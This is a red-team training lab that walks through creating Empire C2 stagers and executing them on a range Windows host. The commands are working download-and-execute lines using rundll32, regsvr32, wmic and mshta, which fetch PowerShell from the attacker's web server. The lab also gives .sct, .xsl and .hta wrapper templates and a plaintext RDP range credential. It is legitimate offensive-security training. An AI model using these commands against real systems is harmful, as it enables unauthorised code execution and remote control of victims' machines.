Skip to content

Lab 3.1 : Creating and Testing Payloads

Objectives

  • Create different payloads for familiarity
  • Test payloads from the range
  • Use additional tools to enhance payloads

This lab will focus on creating multiple payloads and then testing them in the student range. We will use various methods to gain familiarity with different techniques. For the purpose of this lab we will use our RDP connection to the student Windows instance for ease of use.

TTPs Emulated in this Lab

Preparation

Warning

Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.

Preparation Steps

Ensure you are connected to the VPN and can ping from the Slingshot Linux VM to the draconem.io website.

Open a terminal on Slingshot. Connect to the VPN with openvpn and take note of your ip address:

sudo openvpn ~/Desktop/sec565-labs-range.ovpn

Ctrl+Shift+t to open a new terminal tab, then run the following command to create four ICMP packets :

ping -c 4 draconem.io

If you get a successful ping, then curl the website. The ping tests icmp while the curl tests dns, tcp, and http.

curl draconem.io | head

On Your Own

  1. Create an Empire listener
  2. Create a PowerShell stager
  3. Execute the stager with rundll32.exe to create an agent in the target environment via RDP: xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp
  4. Repeat the process with an sct stager and execute with regsvr32.exe
  5. Repeat the process with a wmic stager and execute with wmic
  6. Repeat the process with an hta stager and execute with mshta.exe
  7. Review the walkthrough

Walkthrough

Launch Empire and Starkiller

Note

If your C2 is still active then delete your listeners, set up listener according to the Walkthrough step 1. Then skip down to step 5

1. Launch Empire and start an http listener on port 8080 for your tun0 interface. If you run into any issues refer back to Lab 2.1 - C2 Introduction with Empire

Create PowerShell Stager

2. Create an Empire stager. Click on the suitcase icon on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.

Select multi/launcher in the drop down menu. Then provide the following values:

  • StarkillerName: interactive-http-pwsh
  • Listener: interactive-http
  • Language: powershell

Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

On Slingshot, navigate to the Stagers dashboard, click the three vertical dots icon under actions to bring up the actions menu. Click Copy to Clipboard.

3. Create a directory to store and serve your stagers.

mkdir -p /tmp/3-1/
cd /tmp/3-1/
vim setup.ps1

Press i to enter insert mode in vim, then Ctrl+Shift+v to paste the launcher code. Press esc then type :wq to save the file.

4. Serve or host stagers by starting a python web server in your temporary directory.

cd /tmp/3-1/
python3 -m http.server 8000

Tip

Red Team Tip: Remember to always create a temporary directory to serve payloads or other files for transfer. Serving your home directory or another important directory means that you are serving those files to the world.

Execute Stager with rundll32.exe

5. Deliver your stager to the Windows system. Establish an RDP session to the wk01 Windows instance, using the credentials Gareth.Kilgallen : Hu825meapvsAq#Rx. We will use xfreerdp on our Slingshot Linux VM with the clipboard plugin so that we can paste our stager into a command prompt.

xfreerdp +clipboard /cert-ignore /u:Gareth.Kilgallen /p:Hu825meapvsAq#Rx /v:wk01.draconem.corp

6. Open a command prompt by clicking the windows icon in the lower left and typing cmd.exe. Then enter the following to have rundll32.exe execute javascript that will then execute PowerShell of the launcher code. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent. Do not exit your RDP session.

Warning

Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.

rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();new%20ActiveXObject("WScript.Shell").Run("powershell -nop -exec bypass -c IEX (New-Object Net.WebClient).DownloadString('http://10.254.252.3:8000/setup.ps1');")

In the above command we are using a signed Windows binary that is used to load dlls. We execute in-line javascript to run an HTML application using an Active X object. Then WScript will download our ps1 file and execute it.

Create SCT Stager

7. Create an Empire stager as a Windows Scripting Component file .sct. Click on the suitcase icon on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.

Select windows/launcher_sct in the drop down menu. Then provide the following values:

  • StarkillerName: interactive-http-sct
  • Listener: interactive-http
  • Language: powershell
  • OutFile: /tmp/3-1/config.sct

Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

8. On the Stagers dashboard, click the three vertical dots icon under actions to bring up the actions menu. Click Download and save the file to /tmp/3-1/config.sct.

Execute Stager with regsvr32.exe

9. Open a command prompt, then enter the following to have regsvr32.exe download the sct file from our webserver and execute the PowerShell contained within. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent.

Warning

Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.

regsvr32 /s /n /u /i:http://10.254.252.3:8000/config.sct scrobj.dll

In the above command, /s will run silently without displaying any messages. /n states that the process should not call DLL Register Server. /u is set to use the unregister method.

Create WMIC Stager

10. Create a wmic Empire stager. Click on the suitcase icon on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.

Select windows/wmic in the drop down menu. Then provide the following values:

  • StarkillerName: interactive-http-wmic
  • Listener: interactive-http
  • Language: powershell

Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

11. On the Stagers dashboard, click the three vertical dots icon under actions to bring up the actions menu. Click Download and save the file to /tmp/3-1/update.xsl (the default filename will be launcher.xsl).

Execute Stager with wmic

12. Open a PowerShell prompt, then enter the following to download the xsl file from our webserver and execute the PowerShell contained within. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent.

Warning

Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.

wget http://10.254.252.2:8000/update.xsl -o update.xsl
wmic os get /format:"update.xsl"

Note, this leaves the xsl file behind on disk as an artifact. Keep that in mind during operations. Previously, it was possible to perform this attack completely fileless using wmic os get /format:"http://10.254.252.2:8000/update.xsl" but this has been patched.

Create HTA Stager

13. Create an hta Empire stager. Click on the suitcase icon on the left navigation window to bring up the Stagers dashboard. Then click CREATE in the upper right.

Select windows/hta in the drop down menu. Then provide the following values:

  • StarkillerName: interactive-http-hta
  • Listener: interactive-http
  • Language: powershell

Leave the rest as defaults and click the SUBMIT button in the upper right corner of the screen.

On the Stagers dashboard, click the three vertical dots icon under actions to bring up the actions menu. Click Copy to Clipboard.

14. Save the contents in a file in the temporary directory.

cd /tmp/3-1/
vim app.hta

Press i to enter insert mode in vim, then Ctrl+Shift+v to paste the launcher code. Press esc then type :wq to save the file.

Execute Stager with mshta.exe

15. Open a command prompt, then enter the following to have mshta.exe download and execute the hta file from our webserver and execute the PowerShell contained within. Press Enter to spawn a new agent. Run a few commands on the new agent to check the health of the agent.

Warning

Remember that the IP address of your Slingshot VM may be different than what you see in screenshots and instructions. Please substitute your specific IP address on the tun0 adapter as needed.

mshta.exe http://10.254.252.3:8000/app.hta

Compare payloads

Spend a little time comparing the three wrappers for our PowerShell payload.

config.sct

<?XML version="1.0"?>
<scriptlet>
<registration
description="Win32COMDebug"
progid="Win32COMDebug"
version="1.00"
classid="{AAAA1111-0000-0000-0000-0000FEEDACDC}"
 >
 <script language="JScript">
      <![CDATA[
           var r = new ActiveXObject("WScript.Shell").Run('powershell ... trimmed ...');
      ]]>
 </script>
</registration>
<public>
    <method name="Exec"></method>
</public>
</scriptlet>

update.xsl

<?xml version="1.0"?><stylesheet
xmlns="http://www.w3.org/1999/XSL/Transform" xmlns:ms="urn:schemas-microsoft-com:xslt"
xmlns:user="placeholder"
version="1.0">
<output method="text"/><ms:script implements-prefix="user" language="JScript">
<![CDATA[var r = new ActiveXObject("WScript.Shell").Run("powershell ... trimmed ...");]]

app.hta

<html><head><script>var c= 'powershell... trimmed ...
new ActiveXObject('WScript.Shell').Run(c);</script></head>
<body><script>self.close();</script></body></ht

Conclusion

We used multiple stagers to deliver the first stage of our PowerShell agent. We took the time to execute the code using a few different techniques. The binaries we used are signed Microsoft binaries and most will always be on a Windows system. Some techniques will be highly signatured depending on the the maturity of the target network. It is important to experiment with different techniques and to test in a lab environment. Keep your Empire C2 up for the remainder of the section labs.